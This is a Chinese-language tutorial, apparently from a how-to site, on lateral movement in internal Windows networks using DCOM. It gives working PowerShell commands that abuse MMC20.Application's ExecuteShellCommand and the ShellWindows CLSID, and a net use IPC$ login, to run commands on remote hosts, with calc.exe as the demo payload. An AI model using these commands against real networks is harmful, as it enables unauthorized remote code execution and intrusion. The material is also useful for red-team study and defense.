怎么使用dcom在内网中进行横向移动
本篇内容主要讲解"怎么使用dcom在内网中进行横向移动",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"怎么使用dcom在内网中进行横向移动"吧!
Dcom是微软的一系列概念和程序接口,通过dcom,客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发起请求,今天讲讲如何通过dcom进行横向移动。
首先调用powershell
通过使用指令Get-CimInstance Win32_DCOMApplication来查看获取本地DCOM程序列表
由于Get-CimInstance这个cmdlet只存在于powershell的3.0版本中,所以执行该指令需要2020以上版本的操作系统才可以执行,当然,如果没有3.0版本也可以通过执行Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication来获取,两者效果是相同的。
1. 使用DCOM执行任意命令,适用于本地
1> $com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.101.102"))
2> $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","minimized")
通过执行以上命令,会以当前会话执行Administrator权限的calc.exe
2. 在远程主机中执行命令
首先通过net use \\IP "password" /user:域\dm 建立ipc$连接
然后执行以下命令:
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","目标IP"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","")
即可在远程计算机中执行calc.exe
3. 第二种方法
在远程主机中调用powershell,输入命令:
$com=[Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.101.102")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)
执行calc.exe程序
到此,相信大家对"怎么使用dcom在内网中进行横向移动"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!